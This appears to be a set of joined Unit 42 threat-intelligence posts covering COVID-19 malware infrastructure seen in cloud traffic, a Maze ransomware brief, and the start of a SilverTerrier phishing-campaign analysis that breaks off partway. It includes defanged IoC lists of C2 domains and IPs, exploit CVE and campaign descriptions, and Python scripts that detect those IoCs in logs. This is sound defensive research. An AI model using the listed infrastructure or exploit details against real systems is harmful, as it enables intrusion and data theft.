Unit 42 researchers found that public cloud infrastructure has communicated with domains known to distribute COVID-19 themed malware. On March 24, 2020, Unit 42 published a blog discussing attack patterns used by malicious actors in relation to the novel Coronavirus (COVID-19). Taking these findings a step further, researchers attempted to uncover if there are malicious COVID-19 related events taking place within public cloud infrastructure. If indications of this activity were found, how could organizations protect themselves?

Researchers identified 300+ COVID-19 themed malware samples that communicated with 20 unique IP addresses and domain indicators of compromise (IOCs). After querying Prisma Cloud for network connections to these 20 suspicious IOCs between March 1 and April 7, 2020, researchers found a total of 453,074 unique network connections across 27 unique cloud environments (see Image 1).

    • 450,000+ cloud-based network connections with COVID-19 themed malware IoCs
    • Across 27 unique and potentially compromised cloud environments
    • Clear indications of communication with nodes known to perform command and control (C2) operations related to COVID-19 themed malware
Image 1. Workflow Diagram

It is not clear if each of the 27 identified organizations were in fact compromised with COVID-19 themed malware, as researchers were not able to view the network traffic nor did they receive the malware samples themselves which initiated the witnessed connections. Nonetheless, these network connections should be considered highly suspicious due to the fact that the destination endpoints have a documented history of malware operations.

The Research

Using AutoFocus, a Palo Alto Networks proprietary tool for malware-based threat intelligence research, Unit 42 researchers queried for malware samples that established network connections to domains that contained at least one of the following keywords: “Corona”, “COVID”, “Pandemic”, or “Virus”. Researchers then filtered the results based upon timestamps between March 1 and April 7, 2020. The metadata of these network connections was then analyzed and compared to the network traffic Palo Alto Networks Prisma Cloud maintains.

CAVEAT: Given the nature of network traffic, the network traffic content was not available for analysis, leaving only the network connection’s metadata as a sole means to identify malware network traffic.

AutoFocus returned more than 446 malware samples with network connections to COVID-19 themed domains. These samples provided 20 unique domains and hard-coded IP addresses that could potentially serve or maintain the malware infrastructure. After resolving the domains to their most recently known host IP addresses, these IP addresses were used to query cloud network traffic connections between March 1 and April 7, 2020. The query returned 453,074 unique network connections from cloud environments, which were communicating with systems directly tied to the DNS activity of known COVID-19 themed malware, see Image 1 above.

Table 1 lists the 18 IP addresses identified within Prisma Cloud, together with whether, and by which, content delivery network (CDN) provider they are maintained.

IP Address | CDN Provider | Count
8.251.31[.]254 | Level3 | 91026
95.101.78[.]106 | Akamai International | 83624
95.101.78[.]82 | Akamai International | 81979
8.250.169[.]254 | Level3 | 51091
8.250.183[.]254 | Level3 | 49611
8.251.5[.]254 | Level3 | 46864
8.251.15[.]254 | Level3 | 40262
74.208.236[.]42 | | 6742
120.138.17[.]203 | Telstra Corp | 765
104.28.9[.]246 | Cloudflare Inc | 458
104.31.74[.]50 | Cloudflare Inc | 420
5.79.72[.]163 | | 72
31.170.167[.]123 | | 66
103.140.250[.]215 | | 32
51.77.161[.]45 | | 27
45.81.226[.]17 | | 19
91.234.99[.]234 | | 12
45.128.134[.]14 | | 4
Total Result | | 453074

Table 1. Total COVID-19 themed malware sample DNS activity samples queried through Prisma Cloud

The highlighted values in Table 1 (the rows with a CDN provider) indicate IP addresses that resolve to CDN hosting platforms such as Cloudflare, Level 3, and Akamai Hosting. CDN networks provide limited network information outside of session metadata. Given this limitation, researchers chose to exclude CDN IP addresses from this analysis regardless of the likelihood of malicious content. Unit 42 also published the blog COVID-19: Cloud Threat Landscape, which details CDN website hosting within cloud platforms.

Researchers were able to positively identify seven IP addresses that were witnessed as the destination network connection from 27 unique Prisma Cloud environments. These IP addresses resolve to independently hosted, non-CDN web servers, which have a known history of malicious activity both from the perspective of Unit 42 and from other reputable third-party threat sources like RiskIQ’s PassiveTotal and Hyas Insight. These seven IP addresses, and the domains from which they resolve, significantly increase the likelihood that they serve or maintain malicious content directly associated with COVID-19 themed malware and they are actively communicating with cloud environments, see Table 2.

IP Address | Count
74.208.236.42 | 6742
5.79.72.163 | 72
31.170.167.123 | 66
103.140.250.215 | 32
51.77.161.45 | 27
45.81.226.17 | 19
91.234.99.234 | 12
Total Result | 6970

Table 2. Non-CDN hosted domains and their associated Prisma Cloud network connections

Image 1 displays the network traffic percentages witnessed by these seven IP addresses.

Image 1. Percentage breakdown of suspicious network traffic

Historic Malware Activity

Researchers returned to AutoFocus to refine the malware sample results of these IP addresses. Researchers specifically targeted any malware sample that contains DNS activity with any IP address that is listed in Table 2. The results returned a total of 185 unique malware samples with an assortment of connections to known malware families and exploits like LokiBot, NanoCoreRAT, vulnerability exploits CVE-2017-11882, CVE-2017-0199, and CVE-2012-0158, as well as having several connections to malware operations like Windows Word phishing documents and RTF_ASLR bypass.

While these malware families and exploits appear to have DNS activity linking them to these seven IP addresses, researchers are not suggesting that there exists any link with COVID-19 themed malware and these malware families or exploits outside of their IP infrastructure or DNS activity. For example, it is possible these particular systems could host and provide several variants of malware and it is also possible that more than one malicious group hosts and maintains their own C2 operations on one or more of the systems using the IP addresses in Table 2.

Additionally, each of these seven IP addresses was flagged as “Blacklisted by Third Parties” within RiskIQ’s PassiveTotal on the grounds of phishing, spam, C2 infrastructure, and malware distribution. With the AutoFocus evidence paired with the evidence gathered from RiskIQ’s PassiveTotal and Hyas Insight, researchers are highly confident in determining these IP addresses to be malicious and recommend that no cloud or traditional environment maintain any network communication with them.

Port Analysis

Researchers also analyzed the network sessions to determine the protocols most commonly used by the IP addresses listed in Table 2. As can be seen from the network traffic metadata, shown in Table 3, TCP Port 80 and TCP Port 443 make up 97% of the network traffic to and from these malicious IP addresses, although there are suspicious connections present on ports 25, 110, and 445.

Destination Port | Destination IP | Count
25 | 5.79.72.163 | 8
53 | 51.77.161.45 | 2
80 | 103.140.250.215 | 20
80 | 31.170.167.123 | 39
80 | 45.128.134.14 | 4
80 | 5.79.72.163 | 4
80 | 51.77.161.45 | 14
80 | 74.208.236.42 | 4086
110 | 51.77.161.45 | 3
443 | 103.140.250.215 | 12
443 | 31.170.167.123 | 27
443 | 5.79.72.163 | 56
443 | 51.77.161.45 | 8
443 | 74.208.236.42 | 2655
445 | 45.81.226.17 | 11
445 | 74.208.236.42 | 1
3389 | 45.81.226.17 | 8
3389 | 5.79.72.163 | 4
Total Result | | 6962

Table 3. Destination port analysis of suspicious COVID-19 themed network communications
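The triage the research section describes (match flow-log destinations against IoC-derived IPs, set aside hits on shared CDN addresses where the IP alone says little about which site was contacted, then break the rest down by destination port as in Table 3) can be reproduced over a team's own flow logs. The code below is an added example, not Unit 42's or Prisma Cloud's; the IoC-to-CDN map and the flow records use documentation-range addresses and are constructed for illustration.

```python
"""Match flow records against IoC-derived IP addresses, separate CDN-hosted
hits from independently hosted ones, and summarise the latter by destination
port. Example code added here; all addresses and records are constructed."""
from collections import Counter

WEB_PORTS = {80, 443}

# Constructed IoC-derived destinations: IP -> CDN provider, "" if hosted
# independently. Shared CDN edges serve many unrelated sites, so a hit on
# one is weak evidence on its own and is reported separately.
IOC_HOSTS = {
    "203.0.113.10": "ExampleCDN",
    "203.0.113.11": "ExampleCDN",
    "198.51.100.7": "",
    "198.51.100.9": "",
}

# Constructed flow records: (source, destination, destination port, protocol).
FLOWS = [
    ("10.0.1.5", "203.0.113.10", 443, "tcp"),
    ("10.0.1.5", "203.0.113.11", 443, "tcp"),
    ("10.0.2.9", "198.51.100.7", 443, "tcp"),
    ("10.0.2.9", "198.51.100.7", 80, "tcp"),
    ("10.0.2.9", "198.51.100.7", 80, "tcp"),
    ("10.0.3.1", "198.51.100.9", 25, "tcp"),
    ("10.0.3.1", "198.51.100.9", 445, "tcp"),
    ("10.0.3.1", "192.0.2.55", 443, "tcp"),     # not an IoC at all
]


def triage(flows, ioc_hosts):
    """Return (cdn_hits, direct_hits): connection counts per IoC destination,
    split by whether the destination is a shared CDN address."""
    cdn_hits, direct_hits = Counter(), Counter()
    for _src, dst, _port, _proto in flows:
        if dst not in ioc_hosts:
            continue
        (cdn_hits if ioc_hosts[dst] else direct_hits)[dst] += 1
    return cdn_hits, direct_hits


def port_breakdown(flows, ioc_hosts):
    """For independently hosted IoC destinations only, count connections per
    (destination port, destination IP), report the share on web ports 80/443,
    and list the non-web ports seen, which merit a closer look than bulk
    web traffic does."""
    counts = Counter()
    for _src, dst, port, _proto in flows:
        if dst in ioc_hosts and not ioc_hosts[dst]:
            counts[(port, dst)] += 1
    total = sum(counts.values())
    web = sum(n for (port, _ip), n in counts.items() if port in WEB_PORTS)
    web_share = round(100 * web / total) if total else 0
    non_web = sorted({port for (port, _ip) in counts if port not in WEB_PORTS})
    return {"by_port": dict(sorted(counts.items())), "total": total,
            "web_share_pct": web_share, "non_web_ports": non_web}


if __name__ == "__main__":
    cdn, direct = triage(FLOWS, IOC_HOSTS)
    print("CDN-hosted hits (review with URL/SNI data):", dict(cdn))
    print("Directly hosted hits:", dict(direct))
    print(port_breakdown(FLOWS, IOC_HOSTS))
```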

Drill Down

For the remainder of this blog, the following four IP addresses will be isolated, as they hold the highest likelihood of serving or maintaining malicious COVID-19 themed content to cloud infrastructure: 74.208.236[.]42, 31.170.167[.]123, 5.79.72[.]163, and 51.77.161[.]45.

74.208.236[.]42

The IP address 74.208.236[.]42 comprised the majority of the network connections with 97% of the non-CDN traffic originating from cloud environments. This IP address is the sole resolution for the domain unlimitedimportandexport[.]com, which is flagged for malicious content regarding command and control infrastructure, malware distribution, and phishing operations using COVID-19 themed attacks.

AutoFocus contained 15 malware samples that perform network connections to the domain unlimitedimportandexport[.]com and its resolving IP address 74.208.236[.]42, with a first seen date between March 1 and April 7, 2020. AutoFocus had tagged each of these malware samples as either ExcelLaunchPowerShell (12) or WinwordLaunchPowershell (7). No other domain was identified resolving to this IP address from any other AutoFocus samples. While the domain is not the only site hosted on the system residing at 74.208.236[.]42, this IP address is to be considered highly suspicious and likely delivers malicious content to cloud environments.

31.170.167[.]123

Unit 42 released a blog on April 12, 2020, detailing Malicious Attackers Target Government and Medical Organizations With COVID-19 Themed Phishing Campaigns. Within that report, the IP address 31.170.167[.]123, which resolves from the domain www.tempinfo[.]96[.]it, was identified as the C2 node used to receive the username and hostname from the victim organization, which was then used to generate an AES encryption key. This encryption key is then returned to the victim by means of an HTTP POST from the URL www.tempinfo[.]96[.]lt/wras/savekey.php, and the encryption process is initiated.

This IP address was found to have network communications with three organizations within the Prisma Cloud network metadata. However, the organizations involved were not government or medical organizations, as they were detailed within the previous Unit 42 blog, but rather included a US-based business data and analytics firm, a US-based market analysis firm, and a US-based network analytic company. This IP indicator should be considered highly suspicious and all network communications with it should initiate an incident investigation.

5.79.72[.]163

The IP address 5.79.72[.]163 was witnessed interacting with six of the 27 disparate cloud environments. The IP address resolves to the domain teknik[.]io, which maintains a firm history of malicious actions including malware distribution operations. No other domain has been seen resolving to this IP address and any connections to this IP address should be considered suspicious.

AutoFocus contains 143 malware samples, associated with this domain and the resolving IP address, with a first seen date between March 1 and April 7, 2020. The vast majority of these malware samples were tagged as exploiting CVE-2017-11882 (130) or CVE-2017-0199 (21), with a couple of samples also tagged as LokiBot (10) and NanoCoreRAT (4). The malware appears to center around Windows operating systems and focuses on Rich Text File documents to infect systems. All network traffic to or from this domain and its resolving IP address should be considered highly suspicious and efforts should be made to terminate future network connections.

51.77.161[.]45

The IP address 51.77.161[.]45 has been linked to COVID-19 themed malicious content via the domain kplico[.]com. This domain has been put on third-party denylists due to malware distribution and phishing attempts, and the system only appears to host specific domains at specific times. These domains appear to rotate across 16 predominantly Iranian-based domains.

Analysis of the malware samples gathered from AutoFocus yielded only three positive malware samples first seen during the March 1 through April 7, 2020 timeframe used for this research, tagged as CVE-2017-11882, CVE-2017-0199, and WinwordLaunchPowershell. However, there have been a total of 11 confirmed malware samples since January 27, 2020. All known malware samples make DNS requests to the domain kplico[.]com, and AutoFocus tags the majority of the older samples as NanoCoreRAT (6).

Conclusion

Of the 300+ malware samples identified to communicate with known COVID-19 related malware, 20 unique IP addresses and domains were identified. Network traffic from all known Prisma Cloud environments was queried using these 20 suspicious IP addresses and domains and a total of 453,074 unique network connections were identified between March 1 and April 7, 2020, see Image 1 above.

Of these network connections, seven IP addresses were identified, which gave a high likelihood of positive malware communications with cloud infrastructure. These communications are highly likely to contain malicious transmissions to and from infrastructure known to host COVID-19 related operations.

It is not clear if each of the 27 identified organizations was in fact compromised with COVID-19-themed malware, as researchers were not able to view the network traffic, nor did they receive the malware samples themselves which initiated the witnessed connections. It is critical that every organization monitor their cloud infrastructure network communications to ensure that these types of malicious communications are identified and blocked. CNSP methodologies must be integrated into cloud infrastructure, development, and production environments to ensure these COVID-19-themed attacks cannot be maintained within a cloud infrastructure.
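One way to act on the monitoring recommendation above, as an added example that is not part of this report: a Python script that refangs the IP addresses and domains published in the IOC section below and flags network log lines that contact them, matching subdomains of an indicator domain as well as the domain itself. The log lines and their field names (src=, client=, query=) are constructed for the example and are not a real product format.

```python
"""Match the defanged network IOCs from this report against network log lines."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# IP addresses and domains from this report's IOC section, in their published (defanged) form.
DEFANGED_IPS = [
    "5.79.72[.]163", "31.170.167[.]123", "45.81.226[.]17", "51.77.161[.]45",
    "74.208.236[.]42", "91.234.99[.]234", "103.140.250[.]215",
]
DEFANGED_DOMAINS = [
    "kplico[.]com", "teknik[.]io", "tempinfo[.]96[.]it", "unlimitedimportandexport[.]com",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'a[.]b' back into 'a.b', lowercased."""
    return indicator.replace("[.]", ".").replace("(.)", ".").strip().lower()


# Normalise once: IPs are validated through the ipaddress module, domains kept as strings.
IOC_IPS = frozenset(str(ipaddress.ip_address(refang(i))) for i in DEFANGED_IPS)
IOC_DOMAINS = frozenset(refang(d) for d in DEFANGED_DOMAINS)

# Any run of hostname/IP characters; the log format itself does not matter.
TOKEN_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.\-]*")
# Constructed field names for the internal host that made the connection or query.
SOURCE_RE = re.compile(r"\b(?:src|client)=(\d{1,3}(?:\.\d{1,3}){3})")


@dataclass(frozen=True)
class Hit:
    line_no: int
    source: Optional[str]  # internal host, if the line carried one
    kind: str              # "ip" or "domain"
    indicator: str         # matched IOC in refanged form


def domain_matches(name: str) -> Optional[str]:
    """Return the IOC domain that `name` equals or is a subdomain of, else None.

    Matching is done label by label, so 'notkplico.com' does not match 'kplico.com'.
    """
    labels = name.rstrip(".").lower().split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in IOC_DOMAINS:
            return candidate
    return None


def scan_log(log_text: str) -> List[Hit]:
    """Scan each line for tokens that are IOC IPs or IOC domains (or their subdomains)."""
    hits: List[Hit] = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        src = SOURCE_RE.search(line)
        source = src.group(1) if src else None
        seen: Set[str] = set()  # report each indicator once per line
        for token in TOKEN_RE.findall(line):
            if "." not in token:
                continue
            try:
                ip = str(ipaddress.ip_address(token))
            except ValueError:
                ip = None
            if ip is not None:
                match, kind = (ip if ip in IOC_IPS else None), "ip"
            else:
                match, kind = domain_matches(token), "domain"
            if match and match not in seen:
                seen.add(match)
                hits.append(Hit(line_no, source, kind, match))
    return hits


def hits_by_source(hits: List[Hit]) -> Dict[str, Set[str]]:
    """Group matched indicators by the internal host that contacted them."""
    summary: Dict[str, Set[str]] = {}
    for h in hits:
        summary.setdefault(h.source or "unknown", set()).add(h.indicator)
    return summary


# Constructed sample log: one flow record to an IOC IP, one DNS query to a subdomain of an
# IOC domain, a benign flow, a near-miss domain, and a query to a third-level IOC domain.
SAMPLE_LOG = """\
2020-03-15T10:02:11Z flow src=10.0.1.12 dst=51.77.161.45 dport=443 proto=tcp action=ACCEPT
2020-03-15T10:02:14Z dns client=10.0.1.12 query=mail.kplico.com type=A
2020-03-15T10:03:02Z flow src=10.0.1.40 dst=8.8.8.8 dport=53 proto=udp action=ACCEPT
2020-03-15T10:05:30Z dns client=10.0.2.7 query=notkplico.com type=A
2020-03-15T10:06:01Z dns client=10.0.2.7 query=www.tempinfo.96.it type=A
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.source} -> {hit.indicator} ({hit.kind})")
    print(hits_by_source(scan_log(SAMPLE_LOG)))
```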

Mitigation

Palo Alto Network Next-Generation Firewalls

Each of the IOCs listed within the following IOC section was added to PAN-DB, which allows each next-generation firewall, both hardware and VM-Series, to block network traffic to the identified IP addresses and domains, as well as to block any of the malware samples listed within the report.

Prisma Cloud

Prisma Cloud has taken its first steps into integrating AutoFocus Indicators of Compromise (IoCs) into its operation base to ensure that cloud organizations can quickly identify when their cloud infrastructure communicates with known malware infrastructure. Now that Prisma Cloud combines AutoFocus with its ability to monitor cloud endpoints, detect malicious actions, and alert upon critical vulnerabilities, Prisma Cloud is able to monitor and protect single, hybrid, and multi-cloud environments using proven threat intelligence.

Cloud Native Security Platforms

Integrate Cloud Native Security Platforms (CNSP) into the CI/CD pipeline to ensure that cloud infrastructure is properly vetted for security risks. CNSPs share context about infrastructure, PaaS, users, development platforms, data and application workloads across platform components to enhance security. CNSP offers organizations the ability to deliver secure cloud infrastructure while simultaneously using the hallmarks of cloud, security automation, secure scalability, manageability, and secure on-demand resourcing.

IaC Scanning

Every Infrastructure-as-Code (IaC) template used within both development and production environments should be scanned for misconfigurations and vulnerabilities prior to its use. According to the Unit 42 Cloud Threat Report: Spring 2020, more than 42% of all IaC templates pulled from GitHub contain at least one misconfiguration or vulnerability.

Indicators of Compromise (IOCs)

IP Addresses

5.79.72[.]163

31.170.167[.]123

45.81.226[.]17

51.77.161[.]45

74.208.236[.]42

91.234.99[.]234

103.140.250[.]215

Domains

kplico[.]com

teknik[.]io

tempinfo[.]96[.]it

unlimitedimportandexport[.]com

Hashes

Threat Brief: Maze Ransomware

Executive Summary

Since the beginning of the calendar year, Palo Alto Networks has detected an uptick in Maze ransomware samples across multiple industries. As a result, we've created this general threat assessment post on the Maze ransomware activities and full visualization of these techniques can be viewed in the Unit 42 Playbook Viewer.

Maze ransomware, a variant of ChaCha ransomware, was first observed in May 2019 and has targeted organizations in North America, South America, Europe, Asia, and Australia. This ransomware is typically distributed via emails containing weaponized Word or Excel attachments. However, it has also been distributed via exploit kits such as the Spelevo Exploit Kit, which has been used with Flash Player vulnerabilities CVE-2018-15982 and CVE-2018-4878. Maze ransomware has also utilized exploits CVE-2019-11510 (Pulse VPN), as well as CVE-2018-8174 (Internet Explorer) to get into a network. The malware first establishes a foothold within the environment. It then obtains elevated privileges, conducts lateral movement, and begins file encryption across all drives. However, before encrypting the data, these operators may exfiltrate the files to be used for further coercion, including public exposure. Without the proper protections in place, a Maze ransomware infection will cripple normal business operations, and sensitive information will be compromised, resulting in a monetary loss.

Maze has not only been observed globally, but also affecting varying industries, which include: finance, technology, telecommunications, healthcare, government, construction, hospitality, media and communications, utilities and energy, pharma and life sciences, education, insurance, wholesale, and legal. On March 26, 2020, McAfee published a report providing a detailed overview of the Maze ransomware.

Palo Alto Networks Cortex XDR contains an Anti-Ransomware Protection module, which targets encryption-based activities associated with ransomware. Customers can also review activity associated with this Threat Brief via AutoFocus.

Impact Assessment

Several adversarial techniques were observed in this activity.

The following measures are suggested within Palo Alto Networks products and services for Maze ransomware:

| Tactic | Technique (MITRE ATT&CK ID) | Product/Service | Course of Action |
|---|---|---|---|
| Initial Access | External Remote Services (T1133) | NGFW | Configure Interfaces and Zone segmentation |
| | | Threat Prevention | Deploy Vulnerability Protection Profile for all low and high severity threats with block action |
| | | Cortex XDR | Configure Host Firewall Profile |
| Initial Access | Spear-Phishing Attachment (T1193) | NGFW | Configure a File Blocking Profile |
| | | Threat Prevention | Enable Anti-Virus profile with reset-both action |
| | | WildFire | Forward files for WildFire Analysis |
| | | Cortex XDR | Configure Malware Security Profile |
| Initial Access | Drive-by Compromise (T1189) | NGFW | Block all unknown and unauthorized applications |
| | | Threat Prevention | Deploy Vulnerability Protection Profile for all low and high severity threats with block action |
| | | DNS Security | Enable DNS Security in Anti-Spyware profile |
| | | URL Filtering | Control web access based on URL Category |
| | | WildFire | Forward files for WildFire Analysis |
| Initial Access | Trusted Relationship (T1199) | NGFW | Configure Interfaces and Zones segmentation |
| Initial Access, Privilege Escalation, Persistence, Defense Evasion | Valid Accounts (T1078) | NGFW | Configure Multi-Factor Authentication |
| | | Threat Prevention | Enable Credential Phishing protection |
| | | Cortex XSOAR | Deploy Cortex XSOAR Playbook - Access Investigation |
| Execution, Defense Evasion | Scripting (T1064) | WildFire | Forward files for WildFire Analysis |
| | | Cortex XDR | Enable Anti-Exploit and Anti-Malware Protection |
| Execution | PowerShell (T1086) | Cortex XDR | Enable Anti-Exploit and Anti-Malware Protection |
| Execution | Command-Line Interface (T1059) | Cortex XDR | Enable Anti-Exploit and Anti-Malware Protection |
| Execution | Service Execution (T1035) | Cortex XDR | Configure Behavioral Threat Protection under the Malware Security Profile |
| Persistence | Modify Existing Service (T1031) | Cortex XDR | Configure Behavioral Threat Protection under the Malware Security Profile |
| Persistence | Registry Run Keys / Startup Folder (T1060) | Cortex XDR | Configure Behavioral Threat Protection under the Malware Security Profile |
| Persistence | New Service (T1050) | Cortex XDR | Configure Behavioral Threat Protection under the Malware Security Profile |
| Privilege Escalation | Exploitation for Privilege Escalation (T1068) | Cortex XDR | Enable Anti-Exploit and Anti-Malware Protection |
| Defense Evasion | NTFS File Attributes (T1096) | NGFW | Block all unknown and unauthorized applications |
| | | WildFire | Forward files for WildFire Analysis |
| | | Cortex XDR | Configure Behavioral Threat Protection under the Malware Security Profile |
| Defense Evasion | Obfuscated Files or Information (T1027) | WildFire | Forward files for WildFire Analysis |
| | | Cortex XDR | Enable Anti-Exploit and Anti-Malware Protection |
| Defense Evasion | Disabling Security Tools (T1089) | Cortex XDR | Configure Behavioral Threat Protection under the Malware Security Profile |
| Credential Access | Brute Force (T1110) | NGFW | Create a rule to modify the default action for all signatures in the brute force category to block-ip address action |
| Credential Access | Credential Dumping (T1003) | Cortex XDR | Cortex XDR monitors for behavioral events and files associated with credential access and exfiltration |
| Lateral Movement | Remote Desktop Protocol (T1076) | NGFW | Configure Multi-Factor Authentication; Create User Group for Limited Access to Allow List Applications; Configure Interfaces and Zones segmentation |
| | | Cortex XDR | Configure Host Firewall Profile |
| Collection | Data from Local System (T1005) | Cortex XDR | Cortex XDR monitors for behavioral events and files associated with collection activities |
| Command and Control | Standard Application Layer Protocol (T1071) | NGFW | Block all unknown and unauthorized applications |
| | | DNS Security | Deploy Anti-Spyware profiles with block action |
| | | Cortex XDR | Cortex XDR monitors for behavioral events indicative of command and control activity |
| Command and Control | Remote File Copy (T1105) | NGFW | Block all unknown and unauthorized applications |
| | | WildFire | Forward files for WildFire Analysis |
| | | Cortex XDR | Cortex XDR monitors for behavioral events associated with file creation, staging, and exfiltration |
| Command and Control | Standard Cryptographic Protocol (T1032) | NGFW | Block all unknown and unauthorized applications; Enable SSL decryption |
| | | DNS Security | Enable DNS Security in Anti-Spyware profile |
| | | WildFire | Forward SSL decrypted files to WildFire |
| Discovery | File and Directory Discovery (T1083) | Cortex XDR | Cortex XDR monitors for behavioral events along a causality chain to identify discovery behaviors |
| Discovery | Network Share Discovery (T1135) | Cortex XDR | Cortex XDR monitors for behavioral events along a causality chain to identify discovery behaviors |
| Discovery | Process Discovery (T1057) | Cortex XDR | Cortex XDR monitors for behavioral events along a causality chain to identify discovery behaviors |
| Discovery | Software Discovery (T1518) | Cortex XDR | Cortex XDR monitors for behavioral events along a causality chain to identify discovery behaviors |
| Discovery | System Information Discovery (T1082) | Cortex XDR | Cortex XDR monitors for behavioral events along a causality chain to identify discovery behaviors |
| Exfiltration | Data Encrypted (T1022) | Cortex XDR | Configure Behavioral Threat Protection under the Malware Security Profile |
| Exfiltration | Exfiltration Over Alternative Protocol (T1048) | NGFW | Block all unknown and unauthorized applications |
| | | DNS Security | Enable DNS Security in Anti-Spyware profile |
| Exfiltration | Exfiltration Over Command and Control (T1041) | NGFW | Block all unknown and unauthorized applications |
| | | DNS Security | Enable DNS Security in the Anti-Spyware profile |
| | | Threat Prevention | Enable Anti-Spyware Profile with Block Action |
| Impact | Data Encrypted for Impact (T1486) | Cortex XSOAR | Deploy Cortex XSOAR Playbook - Ransomware Manual for incident response |

Table 1. Course of Action for Maze Ransomware
These capabilities are part of the NGFW security subscriptions service.

Recently, malicious operators behind the Maze ransomware activities compromised multiple IT service providers. These operators were also able to establish a foothold within another victim’s network through insecure Remote Desktop Protocol and other remote service connections or by brute-forcing the local administrator account. Organizations should be mindful of potential compromises through third-party sources and ensure strong passwords are used for all systems capable of remote access.

It was also reported that Maze operators pay special attention to cloud backups on the compromised network. If the operators obtain login credentials, they are then able to download all backup data to an actor-controlled server. Organizations should ensure that all cloud backup files are properly stored and protected.

Threat Education

What is Ransomware?

Ransomware is a criminal business model that uses malicious software to hold valuable files and other data for ransom. Victims of ransomware attacks may have their operations degraded or shut down entirely.

For additional details on what ransomware is, visit the Palo Alto Networks Cyberpedia:
https://www.paloaltonetworks.com/cyberpedia/what-is-ransomware

Palo Alto Networks customers can review activity associated with this Threat Brief via AutoFocus using the following tags: Maze, SpelevoEKFlashContainer.

Palo Alto Networks Cortex XDR contains an Anti-Ransomware Protection module. This module targets encryption-based activity associated with ransomware. Cortex XDR contains defined behavioral indicators of compromise designed to detect anomalies within your network.

More information on ransomware can be found in the 2021 Unit 42 Ransomware Threat Report.

References

https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf
https://www.docdroid.net/dUpPY5s/maze-pdf#page=2

The suggested courses of action in this report are based on the information currently available to Palo Alto Networks and the capabilities within Palo Alto Networks products and services.

SilverTerrier: New COVID-19 Themed Business Email Compromise Schemes

Executive Summary

Focusing on one of the most active subsets of the global threat landscape, Palo Alto Networks Unit 42 tracks Nigerian cyber criminals involved in Business Email Compromise (BEC) activities under the name SilverTerrier. Over the past 90 days (Jan. 30 - Apr. 30), we have observed three SilverTerrier actors/groups launch a series of 10 COVID-19 themed malware campaigns. These campaigns have produced over 170 phishing emails seen across our customer base. While broad in their targeting, these actors have exercised minimal restraint in terms of targeting organizations that are critical to COVID-19 response efforts. Specifically, we find it alarming that several of these campaigns recklessly included targets at government healthcare agencies, local and regional governments, large universities with medical programs/centers, regional utilities, medical publishing firms, and insurance companies across the United States, Australia, Canada, Italy, and the United Kingdom.

According to the recently released annual report from the Internet Crime Complaint Center (IC3), the Federal Bureau of Investigation (FBI) observed a record 23,775 BEC attacks in 2019. Significantly greater than all other categories of cybercrime over the same period, these attacks resulted in an estimated US$1.77 billion in global losses.

With the global impacts of COVID-19, an unprecedented number of corporations are expediting their cloud infrastructure migrations, all while transitioning to a largely remote workforce that is understandably interested in all topics related to the virus. Given this trend, it should come as no surprise that BEC actors are seizing opportunities to exploit the situation through tailored phishing campaigns related to COVID-19.

None of the malicious campaigns mentioned in this blog were successful in infecting their intended targets. Palo Alto Networks security service offerings (URL Filtering, WildFire, and Threat Prevention) detect and classify all samples and associated infrastructure as malicious.

Actor 1

We identified the most pronounced activity as a series of eight campaigns that are either directly related, or within one to two degrees of separation, from a SilverTerrier actor that is well-known across the cybersecurity community. For the purposes of this blog, we will refer to this individual as Actor 1.

Campaign 1

The first campaign was launched on January 30, 2020 with variations of the email subject sent in both English and Indonesian. Attached to the email was a sample of Lokibot malware disguised as an Indonesian health department document. Upon infecting a victim, the malware was designed to call out to petroindonesia[.]co[.]id.

Table 1. Indicators from the first campaign
Campaign 2

A little more than a month later, we observed a single email sent to a major utility provider in the United States. This message was crafted to appear as if it were an email that had been forwarded from the “UN,” presumed to be the United Nations. Attached to the email was a Microsoft Excel spreadsheet containing text written in the Afrikaans language (Figure 1). Upon opening, the file leverages the CVE-2017-11882 vulnerability to call out and download an executable called “dutchz.exe” from the domain uzoclouds[.]eu and subsequently attempts to connect via SMTP to mailhostbox[.]com. Although Microsoft has released security updates for this vulnerability, it remains in common use amongst cyber criminals. In attributing this activity, the domain uzoclouds[.]eu stands out as being directly associated with Actor 1, and the Excel file itself was last edited by modexcomm, which is a known alias for this actor.

Figure 1. Content and translation of UPDATE!!!.xlsx
Table 2. Indicators from the second campaign
Campaign 3

On March 23, 2020, a third campaign was discovered with several phishing emails sent to an Australian health insurance provider. This time the subject and attachment were scoped to portray an order form for new face masks. Similar to the previous campaign, the attached RTF document leveraged the CVE-2017-11882 vulnerability to call out to both posqit[.]net and bit[.]ly, thus taking advantage of a URL shortening service to obscure one of the connections. Per the research and analysis blog by Cyren, this sample downloads and installs AgentTesla malware.

Table 3. Indicators from the third campaign
Campaign 4

Beginning the next day (March 24) and continuing through April 7, 2020, a fourth, more complex, campaign was observed. This time, three different email accounts were used to send three different malicious attachments. Common amongst all of these phishing attempts was the same email subject relating to COVID-19 supplies. Noting that email subjects are not typically used as a basis for establishing correlation between phishing campaigns, we believe that in this case the uniqueness of the subject (to include identical capitalization and punctuation), combined with similar attachment names and malware families provides a sufficient pattern to suggest that these three events are related.

The first emails were sent to several recipients, including a university in the United States with a large medical program. Consistent with previous campaigns, the attachment was a Microsoft Office document that leveraged the CVE-2017-11882 vulnerability. More specifically, it was a protected Excel file with the blurred heading “Galaxy International Trading Limited” that, upon being opened, called out to both mecharnise[.]ir and metadefenderinternationalsolutionfor[.]duckdns[.]org to download additional executables on victim machines.

Figure 2. Campaign 4 Email Targeting US University - Sample Products.xlsx

Next, we saw a single phishing email sent to a Canadian health agency. Setting itself apart from previous samples, this attachment was in fact a sample of AgentTesla packaged as “Product_Sample_List.exe” inside a compressed RAR file. After infecting a potential victim, this file was configured to use SMTP for its command and control with coffiices[.]com.

Finally, the third set of emails were sent to several recipients, including an Australian energy company. Consistent with the previous email, this set once again included a sample of AgentTesla packaged as “Sample Product.exe” inside a compressed RAR file. Additionally, similar to the second campaign, this sample was configured to connect to an account at mailhostbox[.]com for command and control.

Table 4. Indicators from the fourth campaign
Linking Campaigns 1-4

